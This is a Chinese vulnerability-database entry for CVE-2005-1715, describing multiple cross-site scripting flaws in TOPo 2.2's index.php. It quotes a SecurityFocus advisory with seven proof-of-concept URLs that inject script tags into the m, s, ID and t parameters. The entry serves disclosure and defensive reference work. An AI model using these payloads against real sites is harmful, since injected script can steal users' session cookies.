EJ3 TOPo多个Index.PHP跨站脚本攻击漏洞

EJ3 TOPo多个Index.PHP跨站脚本攻击漏洞

漏洞ID 1107333 漏洞类型 跨站脚本
发布时间 2003-05-20 更新时间 2005-10-20
图片[1]-EJ3 TOPo多个Index.PHP跨站脚本攻击漏洞-安全小百科CVE编号 CVE-2005-1715
图片[2]-EJ3 TOPo多个Index.PHP跨站脚本攻击漏洞-安全小百科CNNVD-ID CNNVD-200505-1185
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/25689
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1185
|漏洞详情
TOPo2.2(2.2.178)的index.php存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过(1)m,(2)s,(3)ID或(4)t参数或者评论段中的(5)字段名,(6)您的Web字段或(7)电子邮件字段,注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/13700/info

TOPo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/topo/index.php?m=top"><SCRIPT>alert()</script>&s=info&ID=1114815037.2498
http://www.example.com/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT>alert()</SCRIPT>&t=puntuar
http://www.example.com/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar
http://www.example.com/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://www.example.com/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT>alert()</script>
http://www.example.com/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT>alert()</script>
http://www.example.com/topo/index.php?m=members&s=html&t=edit"><SCRIPT>alert()</script>
|参考资料

来源:MISC
链接:http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
来源:BID
名称:13701
链接:http://www.securityfocus.com/bid/13701
来源:BID
名称:13700
链接:http://www.securityfocus.com/bid/13700
来源:OSVDB
名称:16699
链接:http://www.osvdb.org/16699
来源:SECTRACK
名称:1014016
链接:http://securitytracker.com/id?1014016
来源:SECUNIA
名称:15325
链接:http://secunia.com/advisories/15325

相关推荐: ASPNuke Profile.ASP Cross-Site Scripting Vulnerability

ASPNuke Profile.ASP Cross-Site Scripting Vulnerability 漏洞ID 1096815 漏洞类型 Input Validation Error 发布时间 2005-04-22 更新时间 2005-04-22 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享